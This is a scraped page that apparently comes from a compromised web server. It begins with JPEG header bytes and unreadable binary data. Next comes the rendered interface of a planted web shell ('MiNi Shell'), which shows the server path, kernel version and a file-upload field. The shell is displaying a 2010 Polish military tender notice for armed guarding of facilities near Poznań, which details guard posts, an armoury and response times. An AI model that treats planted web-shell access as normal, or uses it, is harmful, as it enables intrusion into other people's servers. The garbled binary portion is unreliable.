JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/381538-N-2010.html

<p class="kh_header"><b>Poznań 102: świadczenie usług związanych z ochroną obiektów wojskowych wg zadań: 


zad. nr 1 - świadczenie usług związanych z ochroną obiektu wojskowego w kompleksie 2767 w m. Poznań - Ławica ul. Lotnicza 5;
zad. nr 2 - świadczenie usług związanych z ochroną obiektu wojskowego w kompleksie 8637 w m. Biedrusko k/Poznania;
zad. nr 3 - świadczenie usług związanych z ochroną obiektu wojskowego w kompleksie 5470 w m. Trzaskowo k/ Murowanej Gośliny;
zad. nr 4 - świadczenie usług związanych z ochroną Pływalni przy ul. Dąbrowskiego 252 w Poznaniu;</b><br>
<b>Numer ogłoszenia: 381538 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2094 , skrytka pocztowa 129, 61-716 Poznań 102, woj. wielkopolskie, tel. 061 8578408.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ogloszenia.propublico.pl/jednostkawojskowa2094</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.ogloszenia.propublico.pl/jednostkawojskowa2094</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej - Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług związanych z ochroną obiektów wojskowych wg zadań: 


zad. nr 1 - świadczenie usług związanych z ochroną obiektu wojskowego w kompleksie 2767 w m. Poznań - Ławica ul. Lotnicza 5;
zad. nr 2 - świadczenie usług związanych z ochroną obiektu wojskowego w kompleksie 8637 w m. Biedrusko k/Poznania;
zad. nr 3 - świadczenie usług związanych z ochroną obiektu wojskowego w kompleksie 5470 w m. Trzaskowo k/ Murowanej Gośliny;
zad. nr 4 - świadczenie usług związanych z ochroną Pływalni przy ul. Dąbrowskiego 252 w Poznaniu;.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wg SIWZ i załączników do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium - w związku z art. 5 ust.1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (t. j. Dz. U. z 2010 roku nr 113, poz. 759 z póź.zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki z zakresu art. 22 ust 1 ustawy Pzp dotyczące:
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Warunek ten spełniają Wykonawcy, którzy zgodnie z wymaganiami zawartymi w Ustawie o ochronie informacji niejawnych (t. j. Dz. U. z 2005 r. Nr 196, poz. 1631 z późn. zm.), Ustawie o ochronie osób i mienia (t. j. Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.) oraz ustawie o broni i amunicji (t. j. Dz. U. z 2004 Nr 52 poz. 525 z późn. zm.) posiadają: 
-	Ważną koncesję na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia wydaną przez MSWiA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy przedstawią: 

-wykaz wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty wykonania i odbiorców, do wykazu należy dołączyć dokumenty potwierdzające, że usługi zostały wykonane należycie; - załącznik nr 9-12 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Warunek ten spełniają Wykonawcy, którzy:
dysponują co najmniej niżej wymieniona liczbą pracowników, na każde zadanie osobno - załącznik nr 4- wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, obejmujący wskazanie wszystkich osób, które będą realizować zadanie (kierownicy obiektów, wartownicy, składy grup interwencyjnych):
    Zadanie nr 1 - minimum 38 osób;
    Zadanie nr 2 - minimum 32 osoby;
    Zadanie nr 3 - minimum 32 osoby;
          Zadanie nr 4 - minimum 4 osoby;  
  którzy posiadają:
-poświadczenia bezpieczeństwa do dostępu do informacji niejawnych o klauzuli       POUFNE dla Kierownika ochrony minimum oraz ZASTRZEŻONE dla wszystkich pozostałych pracowników. 
-posiadanie licencji pracownika ochrony (szef obiektu) - II stopnia, pracownicy ochrony I stopnia. 
-pozwolenie na broń dla wszystkich osób przewidzianych do realizacji zadań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Warunek ten spełniają Wykonawcy, którzy:
dysponują co najmniej niżej wymieniona liczbą pracowników, na każde zadanie osobno - załącznik nr 4- wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, obejmujący wskazanie wszystkich osób, które będą realizować zadanie (kierownicy obiektów, wartownicy, składy grup interwencyjnych):
    Zadanie nr 1 - minimum 38 osób;
    Zadanie nr 2 - minimum 32 osoby;
    Zadanie nr 3 - minimum 32 osoby;
    Zadanie nr 4 - minimum 4 osoby;  
  którzy posiadają:
-poświadczenia bezpieczeństwa do dostępu do informacji niejawnych o klauzuli POUFNE dla Kierownika ochrony minimum oraz ZASTRZEŻONE dla wszystkich pozostałych pracowników. 
-posiadanie licencji pracownika ochrony (szef obiektu) - II stopnia, pracownicy ochrony I stopnia. 
-pozwolenie na broń dla wszystkich osób przewidzianych do realizacji zadań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy poosiadają:
-	Opłaconą polisę potwierdzającą , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej  deliktowej i kontraktowej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (ochrona mienia) na kwotę co najmniej 3 000 000,00 PLN na jedno i każde zdarzenie  w  całym zakresie odpowiedzialności za szkody mogące powstać podczas realizacji umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.1.	Inne wymagane dokumenty:
Lp.	Wymagany dokument
1	Złożenie (kopi) dokumentów potwierdzających posiadanie licencji pracownika ochrony (szef obiektu) - II stopnia, pracownicy ochrony I stopnia 

2	Ponadto dla wszystkich osób przewidzianych do realizacji zadań wymagane jest pozwolenie na broń (kopia) 


3	Złożenie (kopi) poświadczenia bezpieczeństwa do dostępu do informacji niejawnych o klauzuli POUFNE dla Kierownika ochrony minimum oraz ZASTRZEŻONE dla wszystkich pozostałych pracowników  

4	Zaświadczenie stwierdzające odbycie przeszkolenia w zakresie ochrony informacji niejawnych dla wszystkich pracowników uczestniczących w realizacji zadania nr 1 - 4, 

5	Wykonawca zobowiązany jest przedstawić pozwolenia radiowe wraz z warunkami wykorzystania częstotliwości wydane przez Prezesa Urzędu Komunikacji Elektronicznej na użytkowanie z wykorzystaniem częstotliwości urządzeń radiowych (radiotelefony bazowe i ruchome) dla poszczególnych obiektów co najmniej na czas trwania zamówienia tj.
- kompleks  2767 Poznań ul. Lotnicza 5 bud. nr. 22 ( jeden radiotelefon bazowy + 7 ruchomych); 
- kompleks 8637 w m. Biedrusko k Poznania ul. Generalska bud nr 29 ( jeden radiotelefon bazowy + 4 ruchomych); 
- kompleks  5470 w m. Trzaskowo k Murowanej Gośliny JW. 2209 wartownia ( jeden radiotelefon bazowy + 7 ruchomych);
- kompleks  2746 Poznań ul. Dąbrowskiego 252 ( jeden radiotelefon bazowy + 1 ruchomy); 

6	Oświadczenie o posiadaniu pełnomocnika do spraw ochrony informacji niejawnych oraz pionu ochrony;
7	Oświadczenie potwierdzające, że firma posiada własną  kancelarię  tajną oraz własne pomieszczenia, umożliwiające prowadzenie prac z dokumentacją niejawną do  wytworzenia, przetworzenia lub przechowywania informacji niejawnych z wykorzystaniem sprzętu teleinformatycznego. Załączyć pisemną akredytację lub akceptację dla własnego systemu teleinformatycznego wydaną przez Służbę Ochrony Państwa SKW lub ABW.

8	Oświadczenie, że firma zatrudnia wyłącznie obywateli polskich (ze wskazaniem na  byłych żołnierzy  zawodowych, rezerwistów wojskowych, policjantów);

9	Oświadczenie że firma zatrudnia przynajmniej w 75% ludzi na podstawie umowy o pracę, za których płacone są składki na ubezpieczenie społeczne i zdrowotne;
10	Przedstawić oświadczenie, że przeciwko niej nie jest prowadzone postępowanie administracyjne lub skarbowe
11	Certyfikat systemu jakości potwierdzający spełnianie normy AQAP -2110:2006 lub 2009 w zakresie ochrony osób i mienia w formie bezpośredniej ochrony fizycznej.

12	Decyzję lub zgodę na prowadzenie zajęć ze szkolenia strzeleckiego pracowników  specjalistycznej uzbrojonej formacji ochronnej (SUFO)  z broni przewidzianej do realizacji zadań ochronnych na strzelnicy na terenie Garnizonu Poznań wydaną przez organ do tego uprawniony - kserokopia dokumentu.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ogloszenia.propublico.pl/jednostkawojskowa2094<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego bud. nr 5 pok. 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2010 godzina 08:00, miejsce: w siedzibie Zamawiającego bud. nr 5 pok. 115.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świadczenie usług związanych z ochroną  kompleksu wojskowego 2767 w m. Poznań - Ławica ul. Lotnicza 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest całodobowa ochrona bezpośrednia obiektów  wojskowych JW. 2094 Poznań ul. Lotnicza 5 w oparciu o dwa posterunki wartownicze z bronią palną długą gwintowaną, oraz obsadę (posterunek bez broni) - biuro przepustek, po przez ochronę, obserwację i patrolowanie kompleksu. Wspomagane przez grupę interwencyjną wyposażoną w broń palną, hełmy, kamizelki kuloodporne,  która przybędzie i podejmie się czynnego działania bezzwłocznie po uzyskaniu sygnału o zagrożeniu na obiekcie jednak nie później niż 8 minut od powiadomienia. Powiadomienie grupy interwencyjnej o sytuacjach kryzysowych realizować drogą radiową;
- Patrole interwencyjne i doraźne. Patrol wystawiany ze składu SUFO w sytuacjach kryzysowych (zadziałanie sygnalizacji alarmowej, naruszenia systemu ochrony, sytuacjach kryzysowych itp.),
- Ochrona obiektu realizowana będzie zgodnie z Instrukcją o ochronie obiektów wojskowych Sygn. OIN  3 2008,
- Ochrona obiektów wojskowych poradnik sygn. OIN 4 2009; 
  Rozporządzeniem Ministra Obrony Narodowej z dnia 21 czerwca 2007 r. Dz.U.2007.126.876 z późniejszymi zmianami, Rozporządzenie ministra obrony narodowej z dnia 19 czerwca 1999 r. W sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i jednostek organi?zacyjnych resortu obrony narodowej późniejszymi zmianami; Rozporządzenie Rady Ministrów z dnia 19.06.1999 w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i  jednostek organizacyjnych resortu obrony narodowej oraz opisem zamówienia.
Posterunek nr 1 - magazyn uzbrojenia i środków bojowych oraz teren wokół magazynu OPCHEM - posterunek zewnętrzny, ochronny, trzyzmienny ruchomy - 24 godzinny - szczegółowe zadania zostaną określone w Instrukcji ochrony obiektu - tabela posterunku; 
 Posterunek nr 2 - rejon magazynów i garaży na PST- posterunek zewnętrzny, ochronny, dwuzmienny ruchomy - 14 godzinny, w dni wolne i świąteczne trzyzmienny ruchomy (24 godziny)  szczegółowe zadania zostaną określone w Instrukcji ochrony obiektu -w tabeli posterunku;   
 Posterunek nr 3 - Biuro Przepustek - całodobowa ochrona bezpośrednia obiektu wojskowego realizowana poprzez kontrolę wejścia, wyjścia, wjazdu, wyjazdu osób i pojazdów z terenu i na teren ochranianego kompleksu. Ochrona będzie realizowana w systemie 24 - godzinnym
 - jeden pracownik ochrony w godzinach 600 do godz. 600
- wspomagany przez drugiego w dni powszednie ( robocze) w godzinach  600 do godz. 1600.
- służba pełniona jest bez broni przez osoby umundurowane, wyposażone w zabezpieczenie osobiste środki łączności i przyciski napadowe, w przypadku wprowadzenia sytuacji kryzysowych i po ogłoszeniu Gotowości do Podjęcia Działań - dodatkowo broń palna, kamizelki kuloodporne i hełmy. 
Szczegółowe zadania i obowiązki ochrony biura zostaną określone w instrukcji, która zostanie opracowana po podpisaniu umowy przez zamawiającego i wykonawcę.
INNE WYMAGANIA WYNIKAJĄCE ZE SPECYFIKI ZADANIA
-  ochrona kompleksu wykonywana jest przez osoby umundurowane, wyposażone w zabezpieczenie osobiste 
( kamizelki kuloodporne, hełmy, przyciski napadowe i środki łączności);
- wykonawca jest zobowiązany do zabezpieczenia przechowywanej broni  i amunicji na wartowni;
  - zabezpieczenie ciągłej łączności radiowej z kierownikiem obiektu, siedzibą wykonawcy i grupą interwencyjną wystawianą przez wykonawcę; 
- wykonawca zobowiązany jest do kontroli służby przez grupę interwencyjną raz na dobę w godzinach nocnych, fakt ten należy odnotować w dokumentach służby dyżurnej;
- minimalna ilość pracowników przewidywana do realizacji zadań związanych z ochroną posterunków 1 i 2 wynosi siedem osób (w tym dowódca warty) i dwie biuro przepustek razem 9 osób; 
- znajomość obsługi i posługiwania się komputerem , centralami alarmowymi przez dowódców wart i obsadę biura przepustek;
- opracowanie z Zamawiającym Instrukcji ochrony obiektu po podpisaniu umowy zgodnej z obowiązującymi rozporządzeniami Rady Ministrów i Ministra Obrony Narodowej;
 - wzmocnienie ochrony posterunków w wyższych stanach gotowości bojowej i sytuacjach kryzysowych  przez grupę interwencyjną wyposażoną jak wartownicy na posterunkach w czasie przez 48 godzin po ogłoszeniu gotowości do podjęcia działań  i zarządzeń kryzysowych;  
- przestrzeganie postępowań zawartych w Instrukcji Bezpieczeństwa Przemysłowego stanowiącej Załącznik nr 1 do umowy.
Zamawiający nie dopuszcza składania ofert wariantowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie usług związanych z ochroną kompleksu wojskowego 8637 w m. Biedrusko k Poznania.</p>
